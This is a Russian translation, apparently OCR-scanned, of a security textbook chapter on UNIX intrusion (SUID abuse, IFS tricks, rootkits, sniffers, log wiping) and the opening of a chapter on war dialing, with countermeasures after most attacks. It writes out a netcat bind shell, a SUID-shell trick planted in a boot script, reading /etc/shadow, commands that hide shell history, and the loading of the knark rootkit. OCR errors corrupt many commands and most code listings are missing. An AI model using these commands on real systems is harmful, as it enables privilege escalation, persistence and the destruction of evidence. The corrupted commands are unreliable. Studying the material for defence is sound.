заботящиеся о безопасности, также заражаются таким образом мышления. Многие из них слишком ленивы для того, чтобы предпринимать какие бы то ни было дополнительные меры при выполнении работы и склонны полагать, что все программы должны выполняться с уровнем привилегий суперпользователя. [tsunami]# find / -type f -perm -04000 -Is Большинство из перечисленных в листинге программ (например, chage и passwd) для корректной работы требуют наличия привилегий SUID. Скорее всего, взломщики сосредоточат свои усилия на таких программах, особенно на тех из них, которые уже взламывались в прошлом или слишком сложны, а следовательно, вероятность того, что в них имеются недостатки и ошибки, достаточно высока. Хорошей отправной точкой является программа dos. Эта программа создает виртуальную машину и для выполнения некоторых операций требует прямого доступа к аппаратным средствам. Прежде всего взломщики обращают внимание на те программы, которые выполняют нетривиальные операции или не находятся под таким жестким контролем, как другие SUID-программы. Давайте проведем небольшое исследование и попробуем определить, насколько программа dos пригодна для взлома. Для этого обратимся к документации HOWTO. Наша цель в данном исследовании — определить, имеются ли в этой программы дефекты, проявляющиеся в тех случаях, когда она запускается в контексте SUID. Если ответ будет положительным, значит, она предстаатается хорошим кандидатом для взлома. Контрмеры: защита от взлома с использэванием SUID-файлов Лучшей мерой по защите от взлома, основанного на использовании SUID/SGID-файлов, является сброс флага SUID/SGID у как можно большего количества файлов. Исчерпывающий список файлов, которые не должны иметь такого бита, привести трудно в связи с большими различиями в версиях UNIX разных разработчиков. Поэтому любой перечень, который мы могли бы представить в данной книге, почти наверняка окажется неполным. Можем лишь посоветовать провести инвентаризацию всех SUID/SGID-файлов и проверить, действительно ли необходимо, чтобы тот или иной файл имел привилегии на уровне суперпользователя. Для этого вы можете использовать метод, который применяют взломщики, когда хотят найти SUID/SGID-файлы. С помощью следующей команды можно найти все SUID-файлы. Общедоступные для записи файлы Еще одной типичной ошибкой в настройке является разрешение записи в важные файлы всем пользователям. Как и в случае файлов SUID, общедоступные для записи файлы создаются для удобства работы. Однако за это приходится расплачиваться понижением уровня защиты важной информации. Если администратор не замечает очевидных недостатков, то злоумышленники, как правило, находят их очень быстро. К файлам, которые часто открывают для всеобщего доступа, относятся системные файлы инициализации, важные системные конфигурационные файлы и пользовательские файлы запуска. Давайте рассмотрим некоторые примеры того, как взломщик может воспользоваться общедоступными для записи файлами, find / -perm -2 -type f -print /etc/rc.d/rc3.d/S991ocal Итак, даже беглого взгляда на полученные результаты достаточно, чтобы сделать вывод о наличии серьезных проблем. В частности, файл /etc/re.d/rc3.d/S991ocal является общедоступным для записи сценарием. Данная ситуация чрезвычайно опасна, поскольку при запуске системы этот сценарий выполняется с привилегиями суперполъзователя. Например, взломщик может создать экземпляр командной оболочки, работающей в контексте SU1D, которая будет запущена при следующем запуске системы. Для этого ему достаточно добавить в файл сценария следующую команду. [tsunami]$ echo "/bin/cp /bin/sh /trap/.sh ; При следующей перезагрузке системы в каталоге /tmp будет создан SUID-экземпляр командной оболочки. Второй возможный метод взлома заключается в использовании каталога /home/public. Поскольку он открыт для записи, с помощью команды mv взломщик может перезаписать любой файл из этого каталога. Это оказывается возможным, поскольку права доступа к каталогу перекрывают права доступа к отдельным файлам этого каталога. Скорее всего, типичный взломщик перепишет файлы запуска пользовательских экземпляров командной оболочки (например. . login или .bashrc), в которых будет создан файл SUID. После того как кто-нибудь использует учетную запись public для регистрации в системе, командная оболочка с правами суперпользователя будет ожидать взломщика. Контрмеры: защита общедоступных для записи файлов Регулярный поиск всех общедоступных для записи файлов является хорошей практикой системного администратора. Измените права записи для всех найденных каталогов и файлов, которые не должны быть общедоступными. Конечно, решение о том, нужно ли тот или иной файл или каталог делать общедоступным, иногда принять довольно сложно, поэтому мы рекомендуем исходить хотя бы из здравого смысла. Если этот файл используется при инициализации, конфигурации или запуске системы, то, скорее всего, он не должен быть общедоступным. Однако помните, что файлы драйверов некоторых устройств, находящиеся в папке /dev, должны быть общедоступными. Поэтому применяйте взвешенный подход к вносимым изменениям и тщательно тестируйте работоспособность системы после каждого существенного изменения. Взлом командной оболочки Командная оболочка UNIX представляет собой очень мощную программу, которая обеспечивает удобную работу пользователей. Одной из главных отличительных особенностей окружения командной оболочки UNIX является возможность программировать команды, а также устанавливать определенные параметры, влияющие на работу самой командной оболочки. Конечно же, как часто бывает в подобных ситуациях, богатые возможности имеют и обратную сторону, проявляющуюся в наличии многочисленных слабых мест с точки зрения обеспечения безопасности. Одним из самых популярных методов взлома является использование переменной IFS (Internal Field Separator). Взлом IFS Переменная IFS предназначена для отделения друг от друга слов, используемых в окружении командной оболочки. Обычно значением переменной IFS является символ пробела, который служит для разделения команд по умолчанию. Манипулируя переменной IFS, взломщик может запустить с помощью какой-нибудь SUID-программы "троянского коня" и получить, таким образом, привилегии суперпользователя. Обычно в этих целях используется сценарий командной оболочки с установленным флагом SUID, однако в рассматриваемом примере мы воспользуемся программой loadmodule. #!/bin/csh Данный сценарий взлома делает текущим каталог /tmp и создает в нем дочерний каталог /bin. Как это зачастую бывает, создается копия /bin/sh, которая вскоре будет запущена. Затем для переменной IFS в сценарии устанавливается значение / вместо символа пробела. Поскольку в переменной 1FS содержится значение /, то SUID-программа loadmodule, ничего не подозревая, запускает на выполнение программу /tmp/bin/bin. В результате создается копия командной оболочки с привилегиями суперпользователя, которой взломщику остается лишь воспользоваться. Контрмеры: защита переменной IFS При взломе с использованием переменной IFS в большинстве случаев мишенью злоумышленников является системная функция system(). Вызов этой функции используется в оболочке sh для анализа командной строки перед ее выполнением Для того чтобы избежать возможных злоупотреблений, можно применить простую программу, которая автоматически устанавливает в качестве значения переменной IFS символ пробела. Ниже приведен пример такой программы, код которой предоставил Джереми Рауч (Jeremy Rauch). #define EXECPATH "/usr/bin/real/" К счастью, большинство современных версий UNIX игнорирует значение переменной IFS, если командная оболочка работает с привилегиями суперпользователя, а ее эффективный UID отличается от реального UID. В качестве совета можно еше pas подчеркнуть, что не нужно создавать сценарии с привилегиями SUID, а количество SUID-файлов свести к минимуму. |
Права root получены — что дальше? Когда уровень адреналина, выброшенного при попытках получить доступ в качестве суперпользователя, возвращается к норме, у взломщика начинается реальная работа. Он будет открывать и просматривать все файлы в поисках интересующей его информации, устанавливать программы перехвата паролей регистрации, telnet, ftp, smtp и snmp, а затем начнет охоту за новой жертвой, используя ваш компьютер в качестве плацдарма. Однако все эти действия предсказуемы и, как правило, сводятся к размещению на взломанном компьютере "набора отмычек" (rootkit). Отмычки Поскольку взломанная система представляет собой ценность для злоумышленника прежде всего как плацдарм для проникновения в другие компьютеры, для него очень важно разместить на взломанной машине и как можно лучше спрятать свой "набор отмычек". Такой набор для системы UNIX обычно состоит их четырех групп инструментов, адаптированных под конкретную платформу и версию операционной системы: (1) программы типа "троянский конь", например такие, как измененные версии login, netstat и ps; (2) программы, предназначенные для создания "потайных ходов", например, вставки inetd; (3) программы перехвата потока данных в сети; (4) программы очистки системных журналов. |
Программы типа "троянский конь" После того как взломщик получит права суперпользователя, он может "троянизировать" практически любую команду операционной системы. Именно поэтому так важно проверять размер, а также дату и время создания и модификации всех двоичных файлов, особенно тех, которые используются чаще всего,— login, su, telnet, ftp, passwd, netstat, ifconfig, Is, ps, ssh, find, du, df, sync, reboot, halt, shutdown и т.д. [tsunami]! nohup nc -1 -p 222 -nw -e /bin/sh & Когда злоумышленник подключится к порту TCP 222, он увидит следующую информацию. [rumble]# nc -nw 24.8.128.204 222 Это означает, что у него имеются все права суперпользователя и он может выполнить любую операцию, для которой нужно обладать привилегиями root, как например, показанную ниже. cat /etc/shadow Количество потенциальных методов внедрения "троянских коней" зависит лишь от воображения злоумышленника (которое, как правило, является весьма богатым и изощренным). Некоторые из возможных методов более подробно описаны в главе 14. Контрмеры: защита от "троянских коней" Обнаружить программы типа "троянский конь" без соответствующих средств подчас довольно трудно. Возлагать надежды на стандартные методы, основанные на размере и дате, не приходится, поскольку опытный взломщик может создать файл, который будет иметь такой же размер, как и исходный, а также те же время и дату. Более эффективным является, например, метод, основанный на использовании программы, определяющей криптографическую контрольную сумму, с помощью которой для каждого исполняемого файла создается уникальная цифровая подпись. Эти подписи должны храниться в защищенном, недоступном для посторонних месте, например на дискете, находящейся в сейфе в специальном помещении. Программы, подобные Tripwire (http://www.tripwire.com) и MDSsum, являются одними из самых популярных в этой категории. Они позволяют записывать уникальные подписи всех программ и однозначно обнаруживать случаи модификации исполняемых файлов злоумышленниками. Очень часто администраторы пренебрегают подсчетом контрольных сумм до тех пор, пока не выявят попыток вторжения. Очевидно, что такое решение нельзя считать идеальным. К счастью, в состав некоторых систем входят пакеты, в которых изначально встроены строгие атгоритмы хэширования. Например, во многих версиях Linux используется формат RPM (RedHat Package Manager). В спецификации RPM определен также алгоритм подсчета контрольных сумм с использованием протокола MD5. Как же все эти средства помогают противостоять опасности вторжения? С помошью проверенной копии утилиты rpm можно сгенерировать запрос к пакету, который не подвергся взлому, и получить информацию о том, были ли изменены связанные с ним двоичные файлы. [@shadow]# rpm -Vvp ftp://ftp.redhat.com/pub/redhat/\ В приведенном примере /bin/Is предстаапяет собой часть пакета утилит для работы с файлами системы RedHat 6.2. Как видно из полученных данных, файл /bin/Is был изменен (5). Это означает, что контрольная сумма двоичного файла и пакета MD5 отличается. А это является верным признаком присутствия злоумышленника. Анализаторы сетевых пакетов Если злоумышленник проник в вашу систему в качестве суперпользователя — это плохо, но, возможно, еще хуже, если кто-то установил на каком-либо сетевом узле утилиту перехвата сетевых пакетов. Такие программы, называемые также анализаторами сетевых пакетов (sniffer; это название стало нарицательным от названия получившей всеобщее признание программы сетевого мониторинга, разработанной компанией Network General, которая в настоящее время является подразделением Network Associates, Inc.), можно без преувеличения назвать самыми опасными инструментами в руках злоумышленника. Это объясняется тем, что анализаторы позволяют взломщику наносить удары практически по любому компьютеру, который отправляет данные на взломанный узел, а также проникать на другие узлы сегмента локальной сети и делать с ними практически все, что заблагорассудится. Что такое анализатор сетевых пакетов Анализаторы изначально были разработаны как средство решения сетевых проблем. Они могут перехватывать, интерпретировать и сохранять для последующего анализа передаваемые по сети пакеты. Это дает возможность сетевым инженерам наблюдать за тем, как данные передаются по линиям связи, и устранять возникающие проблемы либо моделировать те или иные ситуации, наблюдая за прохождением пакетов на самом низком уровне. Ниже приведен пример перехвата пакетов — запись команд регистрации пользователя guest с паролем guest в сети. -----[SYN] (slot 1) Как и многие другие мощные средства, изначально предназначавшиеся для администрирования, с течением времени анализаторы стали применяться совсем для других целей. Можно только представить, сколько важных данных проходит за день по загруженной сети! Среди таких данных — пользовательские имена и пароли, конфиденциальные сообщения электронной почты, файлы, содержащие личную информацию, деловые отчеты и т.д. Так или иначе, если информация такого рода передается по сети, она преобразуется в биты и байты, которые с помощью анализатора могут видеть взломщики, подключившиеся в любой точке маршрута прохождения данных от отправителя до получателя. Как работают анализаторы Самый простой метод ознакомления с принципами работы анализаторов состоит в изучении тех анализаторов, которые ориентированы на сеть Ethernet. Конечно, анализаторы существуют практически для всех типов сетей, но, поскольку архитектура Ethernet является самой распространенной, давайте сосредоточимся именно на ней. Те же самые принципы, как правило, применимы и к сетям с другой архитектурой. Популярные анализаторы В табл. 8.2 приведен не претендующий на полноту перечень инструментальных средств, с которыми нам приходилось сталкиваться и работать чаще всего на протяжении всех тех лет, которые мы посвятили деятельности по оценке уровня безопасности сетей. Таблица 8.2. Популярныебесплатные анализаторы сетевых пакетов для UNIX
Контрмеры: защита от анализаторов Существует три основных подхода к защите от анализаторов, которые могут быть внедрены в вашу сеть или уже внедрены в нее. Обнаружение анализаторов Существует два основных подхода к обнаружению анализаторов — на уровне узла и на уровне сети. На уровне узла самый простой метод заключается в определении того, работает ли сетевой адаптер системы в промискуитетном режиме. В системе UNIX для ответа на этот вопрос можно воспользоваться несколькими программами, включая программу Check Promiscuous Mode (cpm), разработанную специалистами университета Carnegie Mellon University (эту программу можно найти по адресу ftp://info.cert.org/pub/tools/). Шифрование (SSH, IPSec) Давно известным методом борьбы с прослушиванием сетей является шифрование. Только шифрование на уровне получателя и отправителя может обеспечить уровень практически полной конфиденциальности. Необходимая длина ключа должна определяться на основании того, как долго данные остаются важными. Короткие ключи (длиной до 40 бит) допустимо использовать для шифрования потоков данных только в тех случаях, когда данные быстро устаревают. Кроме того, применение коротких ключей позволяет повысить производительность. Очистка системных журналов Не желая предоставлять вам (а тем более — правоохранительным органам) каких-либо сведений о факте получения доступа к системе, взломщик, как правило, постарается очистить системные журналы от следов своего присутствия. В настоящее время существует много утилит очистки журналов, которые в большинстве случаев входят в набор отмычек. К таким программам, в частности, относятся zap, wzap, wted и remove. Однако обычно вполне достаточно даже простого текстового редактора, такого как vi или emacs. [quake]# cat /etc/syslog.conf Обладая этой информацией, злоумышленнику достаточно просмотреть содержимое каталога /var/log, чтобы найти в нем основные файлы журналов. Выведя на экран содержимое каталога, мы найдем в нем файлы журналов всех типов, включая сгоп, maillog, messages, spooler, secure (журналы TCP-оболочек), wtmp и xf erlog. [quake]# who./wtmp Как видно из приведенного листинга, в новом журнале (файл wtmp.out) пользователь joel отсутствует. Теперь осталось скопировать файл wtmp.out поверх файла wtmp, и взломщик сможет скрыть факт своего присутствия в системе. Некоторые программы, такие как zap (для SunOS 4.x), на самом деле меняют лишь время последней регистрации в системе (эту информацию можно увидеть, например, обратившись с запросом finger и указав в качестве параметра имя интересующего вас пользователя). Теперь осталось вручную (точнее с помощью редактора, такого как vi или emacs) модифицировать файлы журналов secure, messages и xferlog, чтобы удалить последние следы своего пребывания в системе. tail -f /var/log/messages Вооружившись простым текстовым редактором, взломщик может удалить все эти записи. Затем, воспользовавшись командой touch, он наверняка восстановит дату и время последнего доступа к файлу. Однако обычно взломщики отключают режим регистрации вводимых команд с использованием соответствующего режима командной оболочки. unset HISTFILE; unset SAVEHIST Кроме того, взломщик может создать ссылку .bash_history на файл /dev/null. [rumble]# In -s /dev/null ~/.bash_history Контрмеры: защита от очистки журналов Файлы журналов очень важно сохранять на таком носителе, на котором их трудно было бы модифицировать. К таким носителям, в частности, относятся файловые системы, поддерживающие расширенные атрибуты, такие как флаг "только для добавления" (append-only). Таким образом, в каждый файл журнала будет только дописываться новая информация, и злоумышленники не смогут ее изменить. Однако это вовсе не панацея, поскольку существует вероятность того, что при наличии времени, желания и соответст-вуюшего опыта злоумышленник сможет обойти этот механизм. Второй метод заключается в регистрации важных событий на защищенном узле. Одним из примеров реализации такого подхода является применение безопасной утилиты syslog компании Core Labs (http://www.core-sdi.com/english/freesoft.html). В этой утилите алгоритмы шифрования используются наряду с возможностью удаленной регистрации событий, что позволяет защитить самые важные журналы. Помните, что если злоумышленнику удалось проникнуть в вашу систему, то к имеющимся журналам нужно относиться с осторожностью, поскольку ему ничего не стоит их подделать. "Наборы отмычек" для модификации ядра В предыдущих разделах были рассмотрены традиционные "наборы отмычек", с помощью которых можно модифицировать определенные файлы взломанной системы, а затем разместить в ней программы типа "троянский конь". В настоящее время такие средства несколько устарели. Современные и гораздо более разрушительные варианты "наборов отмычек" могут функционировать на уровне самого ядра операционной системы. Такие "наборы отмычек" позволяют модифицировать выполняющееся ядро UNIX и, таким образом, вводить в заблуждение все системные программы без модификации самих программ. [shadow]# /sbin/insmod knark.о После этого на экране появится информация о загрузке модуля. [shadow]# /sbin/lsmod Как видно из приведенного фрагмента, модуль ядра knark был успешно загружен. Кроме того, очевидно, что системному администратору не составит труда обнаружить этот модуль. Поэтому абсолютно закономерно, что взломщик захочет оставить свою деятельность незамеченной. Для того чтобы удалить данные о модуле knark из результатов, предоставляемых утилитой Ismod, злоумышленники могут воспользоваться модулем modhide.o (еще одним компонентом пакета knark) [shadow]#/sbin/insmod modhide.o Теперь, после повторного запуска утилиты Ismod, модуль knark таинственным образом "исчезнет" из поля зрения администратора.
[shadow]$ rootme /bin/sh Группа программистов и специалистов по вопросам безопасности Teso разработала еще один вариант ятра под названием Adore, который можно найти по адресу http://teso.scene, at/releases/adore-0 .14. tar. gz. По возможностям эта программа не уступает пакету knark. Ниже представлены некоторые параметры командной строки. [shadow]$ ava Если приведенных выше сведений оказалось недостаточно, то прочитайте статью Сильвио Чезаре (Silvio Cesare), в которой рассматриваются аналогичные средства, позволяющие "на лету" модифицировать выполняющееся в оперативной памяти ядро в системах с "потайным ходом", в которых отсутствует поддержка модулей LK.M. Эту статью и описываемые в ней средства можно найти по адресу http://www.big.-net.au/~silvio/runtime-kernel-kmem-patching.txt. И наконец, Джоб Де Хаас (Job De Haas) выполнил огромную работу по исследованию методов взлома ядра системы Solaris. Часть написанного им кода можно найти по адресу http://www. itsx.com/kernmod-0.2.tar.gz. Контрмеры: защита от средств модификации ядра Как следует из приведенных сведений, "наборы отмычек" для модификации ядра могут оказаться чрезвычайно разрушительными и трудными для выявления. При этом в процессе обнаружения таких средств нельзя доверять ни одной программе и даже самому ядру. В случае взлома ядра окажутся бесполезными и утилиты подсчета контрольных сумм, такие как Tripwire. Одним из возможных способов обнаружения пакета knark заключается в использовании самого пакета. Поскольку с его помощью взломщик может скрыть любой процесс, воспользовавшись командой kill -31 и указав его идентификатор PID, ничто не мешает сделать любой процесс снова видимым. Для этого можно воспользоваться командой kill -32. Вот простой сценарий оболочки, который передает этот сигнал каждому процессу. # ! /bin/sh rm pid S=l He забывайте о том, что kill -31 и kill -32 являются настраиваемыми командами пакета knark. Так что опытный взломщик может изменить эти параметры, чтобы избежать обнаружения своей деятельности. Однако вместе с тем вполне возможно, что другие злоумышленники воспользуются параметрами, заданными по умолчанию.
Программа LIDS представляет собой модуль обновления ядра. Ее необходимо применять к существующему исходному коду ядра, который затем должен быть перестроен. После установки LIDS воспользуйтесь командой lidsadm, чтобы защитить ядро от возможных манипуляций с загружаемыми модулями. Вот что произойдет после установки программы LIDS, если попытаться запустить утилиту knark. [shadow]# insmod knark.о После анализа файла журнала /var/log/messages становится очевидным, что программа LIDS позволяет не только выявить попытку загрузки модуля, но и практически их предотвращает. Jul 9 13:32:02 shadow kernel: LIDS: При использовании систем, отличных от Linux, нужно рассмотреть возможность отключения поддержки модулей LKM, что позволит обеспечить более высокий уровень безопасности. Конечно, подобный подход является не очень элегантным, однако он все же позволит предотвратить попытки применения описанных выше средств. |
Восстановление системы после использования "набора отмычек" Поскольку мы не можем предоставить исчерпывающее описание процедур выявления описанных вторжений, очень важно хотя бы упомянуть о различных мерах, к которым нужно прибегнуть в том случае, если прозвучит зловещий звонок. У вас может возникнуть вопрос: о каком звонке идет речь? Это может произойти примерно следующим образом. "Здравствуйте, я такой-то системный администратор. У меня имеются причины считать, что с ваших компьютеров предпринимаются попытки нападения на нашу сеть." "Этого не может быть, все выглядит абсолютно нормально", — отвечаете вы. Ваш собеседник говорит, что все проверит еще раз, а затем перезвонит еще раз. Так что у вас возникает специфическое ощущение, что позвонить мог лишь администратор, которым и была предпринята попытка взлома. Вам требуется определить, как и что произошло. Оставьте в стороне свое спокойствие и считайте, что любое выполняемое вами в системе действие может повлиять на возможность выявления вторжения. Даже при простом просмотре файла можно изменить время последнего доступа к нему. Для того чтобы не усугубить ситуацию случайными действиями, хорошо сразу же создать набор средств со статически скомпонованными двоичными файлами, а затем сравнить их с аналогичными файлами от поставщика программного обеспечения. Использовать статически скомпонованные двоичные файлы абсолютно необходимо, поскольку злоумышленники могли модифицировать совместно используемые файлы библиотек. Все эти действия должны быть выполнены до возникновения самого инцидента. Набор стандартных статически скомпонованных программ нужно поместить на гибкий диск или компакт-диск. В такой набор как минимум должны входить следующие утилиты. ls su dd Имея под рукой такой набор, очень важно сохранить три значения времени, связанных с каждым файлом системы UNIX. К таким значениям относится последнее время доступа, время последней модификации и время создания. Указанную информацию проще всего получить с использованием следующих команд, а затем сохранить полученные данные на гибком диске или другом внешнем носителе. Is -alRu > /floppy/timestamp_access.txt Полученные результаты лучше всего просматривать автономно, без обращения к "подозрительной" системе. В большинстве случаев вы столкнетесь с "набором отмычек", который, возможно, был установлен с параметрами, заданными по умолчанию. В зависимости от установленного "набора отмычек" вы можете увидеть множество входящих в их состав утилит, сообщений о программах-анализаторах, содержащихся в файлах журналов, и т.д. Это позволит предположить, что вы имеет дело с "набором отмычек", не использующимся для модификации ядра. Все доказательства таких изменений основываются на получении надежных результатов при выполнении приведенных выше команд. При выполнении исследований в системе Linux воспользуйтесь безопасным загрузочным носителем, например с комплектом Trinux (http://www.trinux.org). Это позволит получить достаточно много информации, чтобы попытаться определить, была ли ваша система инфицирована "набором отмычек". Имея под рукой все собранные данные, обратитесь к следующим ресурсам, чтобы точно определить, что же все-таки изменилось в системе и каким образом был выполнен взлом. Очень важно собрать данные о том, какие именно команды запускались и какие при этом результаты были получены. |
Резюме Как мы увидели из нашего исследования, UNIX — это сложная система, для адекватной защиты которой необходимо предпринимать целый ряд комплексных мероприятий. Мощь и элегантность UNIX обеспечивают ее популярность, однако они же являются и причиной ее уязвимости. Мириады методов удаленного и локального взлома позволяют злоумышленникам нарушать подсистему безопасности даже самых защищенных систем UNIX. Чуть ли не ежедневно обнаруживаются новые методы взлома путем переполнения буфера. Программисты мало задумываются о безопасности, а средства обнаружения несанкционированных действий устаревают практически в течение нескольких недель. Между хакерами и администраторами идет не прекращающаяся ни на минуту битва, в которой одни попытаются приблизить, а вторые — отдалить "день зеро". В табл. 8.3 приведен перечень дополнительных ресурсов, которые могут помочь вам обрести душевный покой (во всяком случае, на некоторое время). Таблица 8.3. Дополнительные ресурсы безопасности системы UNIX
|
Глава 9. УЯЗВИМОСТЬ УДАЛЕННЫХ СОЕДИНЕНИЙ, РВХ, VOICEMAIL И ВИРТУАЛЬНЫХ ЧАСТНЫХ СЕТЕЙ
|
Уязвимость удаленных соединений, PBX, VOICEMAIL и виртуальных частных сетей Обычно организации меньше всего внимания уделяют старым забытым телефонным линиям. Эти провода, опоясавшие весь мир, сегодня преданы забвению. В этой главе будет показано, как старенький модем с пропускной способностью 9600 Кбит в секунду может поставить на колени сетевого Голиафа с мошной системной защитой. Предварительный сбор данных о телефонных номерах Хакинг удаленных соединений начинается с определения диапазона телефонных номеров, с которыми будет работать сканер. Настоящие хакеры обычно выбирают компанию-жертву и собирают информацию об используемых ею телефонных номерах из самых разных источников. Ниже будут описаны некоторые механизмы для ограничения сферы распространения такой информации. Registrant: Acme, Incorporated (ACME-DOM) Теперь хакеры имеют не только хорошую отправную точку для работы сканера телефонных номеров, но и кандидатуру сотрудника (John Smith) под именем которого можно осуществлять свою деятельность по сбору дополнительной информации. Помимо этого некоторую полезную информацию можно почерпнуть из раздела технических контактов. А именно здесь видно, как информация фиксируется в базе данных InterNIC. Это уже кое-что. Устраните утечку информации Лучшей защитой против предварительного сбора информации по телефону является предотвращение утечки информации. Конечно же, для обеспечения возможности деловых контактов необходимо раздавать телефонные номера компании, но очень осторожно. Свяжитесь со своим оператором и согласуйте с ним перечень открытых телефонных номеров, список лиц, имеющих доступ к закрытой информации, а также пароль для получения каких-либо закрытых данных. Организуйте группу по устранению утечки информации из числа сотрудников отдела информатизации, которая будет следить за тем, чтобы закрытые телефонные номера не распространялись через Web-узлы, службы каталогов, серверы удаленного доступа и т.д. Свяжитесь с компанией InterNIC и "почистите" контактную информацию для зоны Internet. И наконец, предупредите пользователей, что телефон не всегда друг, поэтому нужно быть проявлять осторожность в разговорах с незнакомцами и не разглашать никакую закрытую информацию. Сканеры телефонных номеров Процесс подбора телефонных номеров во многом определяется используемыми для этого средствами. Поэтому далее будут охарактеризованы конкретные продукты, такие как ToneLoc, THC-Scan и PhoneSweep, Однако сначала приведем некоторые общие рассуждения. Аппаратные средства При подборе телефонных номеров вопрос выбора аппаратных средств не менее важен, чем выбор программного обеспечения. Ниже мы рассмотрим два бесплатных программных средства, предназначенных для операционной системы DOS и снискавших незаслуженную репутацию трудно настраиваемых. Однако для настройки любой программы автопрозвона требуется тонкое знание СОМ-портов компьютера, а на некоторых аппаратных конфигурациях эти программы могут не работать вообще, например на переносном компьютере с интерфейсом PCMCIA. Конечно же, не стоит переоценивать требования к аппаратным средствам: типичный персональный компьютер с двумя стандартными СОМ-портами и последовательной платой для добавления еще двух вполне подойдет для этих целей. В то же время, для профессиональной системы автопрозвона можно установить многопортовую карту Digitboard, позволяющую подключить к системе от 4 до 8 модемов одновременно. Легализация деятельности Наряду с вопросами выбора аппаратной платформы для подбора номеров потенциальные взломщики серьезно рассматривают вопросы законности своей деятельности. В некоторых странах запрещено последовательно набирать большое число номеров, и телефонные компании внимательно следят за соблюдением этого требования, а зачастую их оборудование попросту не позволяет этого делать. Конечно же, все рассматриваемые здесь программы разбивают заданный диапазон номеров на случайные интервалы, чтобы избежать нарушения таких требований, но это все же не гарантирует от попадания в "черный список". Поэтому специалисты, занимающиеся подобной деятельностью на законных основаниях, должны легализовать свои действия и получить письменное разрешение от компании-заказчика на проведение такого тестирования. В этом документе необходимо указать диапазон сканируемых телефонных номеров, чтобы возложить ответственность за выход из диапазона на выполняющую подбор номера организацию. Помните, что сканирование телефонных номеров с включенным идентификатором CallerlD, означающим возможность автоматического определения номера, равнозначно передаче визитной карточки по каждому из набираемых вами номеров. Многократное повторение звонков из одного источника вызовет подозрение у целевой компании, поэтому стоит отключить режим автоматического определения номера на своей телефонной линии (конечно же, если у вас есть разрешение на подобную деятельность, то это не критично). Не следует забывать и том, что при звонках по номерам с префиксом 800 номер звонившего фиксируется в любом случае независимо от статуса CallerlD, поскольку в этой ситуации разговор оплачивается отвечающей стороной.
Стоимость телефонных переговоров И наконец, не забывайте о том, что подбор номеров удаленных целевых организаций оплачивается по междугородному тарифу телефонных переговоров. Поэтому приготовьтесь к получению значительных счетов за телефонные переговоры и заранее согласуйте вопрос их оплаты с заказчиком. Программное обеспечение Поскольку сканирование телефонных номеров обычно выполняется ночью в течение небольших интервалов времени, то важным требованием к соответствующим программам является возможность гибкой настройки графика работы и запоминания уже отсканированных номеров. Бесплатные программы ToneLoc и THC-Scan регулярно сохраняют результаты своей работы в файлах данных, обеспечивая тем самым возможность продолжения работы после последующего перезапуска. Кроме того у них есть определенные средства для задания времени начала и окончания работы в течение одних суток. Однако для выполнения длительных операций сканирования в течение нескольких дней пользователь должен полагаться на возможности операционной системы по планированию выполнения заданий или написать специальный сценарий. Программа PhoneSweep позволяет полностью автоматизировать режим работы. Программа ToneLoc Одной из первых и наиболее популярных программ телефонного сканирования является утилита ToneLoc компании Minor Threat&Mucho Maas (название ToneLoc расшифровывается как Tone Locator). Эту программу можно найти на узле компании, а также на множестве хакерских узлов в Internet. Подобно многим программам-номеронабирателям, ToneLoc работает под управлением DOS (или в окне DOS операционной системы Win 9x или NT), а также с эмулятором DOS в UNIX. В течение многих лет эта утилита являлась эффективным средством для хакеров и консультантов по безопасности. К сожалению, создатели ToneLoc не следят за обновлением своей программы, и никто из сообщества специалистов по безопасности не принимал участия в ее разработке. Поэтому для оценки защищенности Web-узла лучше использовать более робастную программу THC-Scan. ToneLoc [ФайлДанных] /М:[Маска] /R:[Диапазон] Как будет видно из последующего материала, утилита THC-Scan использует очень близкий список параметров. В приведенном ниже примере утилита ToneLoc будет сканировать все телефонные номера от 555-0000 до 555-9999 и записывать информацию в файл test. На рис. 9.2 показана программа ToneLoc в действии. Программа THC-Scan Слабые стороны утилиты ToneLoc компенсирует программа THC-Scan, созданная членом хакерской группы The Hacker's Choice из Германии Ван Хаузером (van Hauser) (http://www.infowar.co.uk/thc/). Подобно ToneLoc, утилита THC-Scan тоже настраивается и запускается в операционной системе DOS, в окне DOS Win 9x или с консоли Windows NT, а также с использованием эмулятора Dos под UNIX.
Перед использованием утилиты THC-Scan сначала с помощью программы TS-CFG необходимо сгенерировать файл конфигурации (. CFG). Эта утилита конфигурации имеет более широкие возможности, чем программа TLCFG для ToneLoc. Большинство параметров конфигурации достаточно просты, но для нестандартной настройки потребуются исчерпывающие знания СОМ-портов. Основные параметры конфигурации перечислены в следующей таблице
Для определения этих параметров применяется утилита MOD-DET, включенная в комплект поставки THC-Scan (на сообщения Windows об ошибках можно не обращать внимания), результат работы которой выглядит следующим образом. MODEM DETECTOR v2.00 (c) 1996,98 by van Hauser/THC После создания файла конфигурации . CFG можно приступать к сканированию телефонных номеров. Синтаксис команды THC-Scan очень напоминает формат ToneLoc и имеет лишь несколько отличий. (Перечень возможных параметров слишком велик, поэтому здесь он приводиться не будет. Его можно найти в четвертой части руководства THC-SCAN.DOC, входящего в комплект поставки программы.) Даже в процессе работы THC-Scan очень напоминает утилиту ToneLoc (рис. 9.3).
Установка режима сканирования выполняется вручную с помощью ключей /s и /Е, задающих время начала и окончания процесса соответственно. Для повторения этого процесса каждый день нужно использовать встроенные средства планирования заданий операционной системы, например команду AT службы Scheduler системы Windows NT. Авторы книги обычно записывают параметры запуска THC-Scan в простой командный файл, который затем вызывается программой AT Scheduler. При планировании графика работы утилиты THC-SCAN.EXE необходимо помнить, что соответствующий файл конфигурации . CFG обязательно должен находиться в текущем каталоге, если не задана опция /!. Поскольку служба Scheduler запускает команды из каталога %systemroot%, для файла конфигурации утилиты THC-SCAN.EXE необходимо задать абсолютный путь, как показано в следующем примере. @@echo off После запуска этого командного файла утилита THC-Scan будет выполнять сканирование с 8 часов вечера до 6 часов утра. С помощью следующей команды можно обеспечить ежедневный запуск утилиты: at 7:58P /interactive /every:1 C\:thc-scan\bin\thc.bat Утилита THC-Scan создает файл данных . DAT и считывает из него информацию за предыдущие дни до тех пор, пока не отсканирует все номера диапазона. Не забудьте удалить всю информацию, оставшуюся после завершения работы утилиты THC-Scan, с помощью команды at /delete. ^~^~^~^~^~^M^~^M?^M^~help^M^~^~^~guest^M^~guest^М^~INFO^M^MLO (^~ означает паузу, а ^М — возврат каретки). Стандартный текст сообщения во многих случаях работает достаточно хорошо, но для достижения конкретной цели этот текст можно изменить. Программа PhoneSweep Если, с вашей точки зрения, использование утилиты THC-Scan требует слишком больших усилий, то вам подойдет программа PhoneSweep. Эту программу распространяет компания Sandstorm Enterprises (http://www.sandstorm.net). Вопросам установки и 